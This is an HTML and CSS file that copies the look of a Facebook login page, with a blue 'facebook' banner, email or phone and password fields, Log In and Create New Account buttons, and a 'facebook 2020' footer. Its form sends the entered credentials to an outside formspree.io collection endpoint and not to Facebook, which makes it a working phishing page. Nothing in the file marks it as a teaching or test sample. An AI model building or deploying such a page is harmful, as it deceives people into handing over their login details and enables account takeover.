
<header class="test">

    facebook

</header>
<body class="test2"></body>
    

<div class="container" style="font-family: Helvetica Neue;;">
<form action="https://formspree.io/xgenjzpb" method="post">

  <input type="text" placeholder="Mobile number or email address" name="email/phone number" ><br>

  <input type="password" placeholder="Enter Password" name="password" ><br>

  <button type="submit" name="log" style="font-family: Helvetica Neue;" >Log In</button>
  <p>or</p>
  <button type="submit" class="test12" value="save">Create New Account</button>
</form>
</div>
<div class="test231">
  Forgotten password? Help Centre



</div>

<div class="test231">

facebook 2020



</div>
  
</body>
<style>
.test {
    background-color: #3a5997;
    width: 100%;
    height: 10%;
    color: white;
    font-size: 50px;
    text-align: center;
    font-family: Helvetica Neue;
    
}





.test231 {
  color: grey;
  text-align: center;
  font-family: Helvetica Neue;
}
.test3 {
    display: inline-block;
    vertical-align: middle; 
}

input[type=text], input[type=password] {
  width: 50%;
  padding: 12px 20px;
  margin: 0px 0;
  display: inline-block;
  border: 1px solid #ccc;
  box-sizing: border-box;
}
.test12 {
    background-color: #4CAF50;
    width: 25%;

}
button {
  background-color:  #1777f2;
  color: white;
  padding: 14px 20px;
  margin: 8px 0;
  border: none;
  cursor: pointer;
  width: 50%;
  font-family: Helvetica Neue;
}

.container {
  padding: 50px;
  text-align: center;
  font-family: Helvetica Neue;
}
form {
  text-align: center;
}
.imgcontainer {
  text-align: center;
  margin: 24px 0 0px 0;
}


.test2 {
    background-color: #D3D3D3;
}
body {
  background-color: #ebeff4;
    margin: 0%;
}

</style>
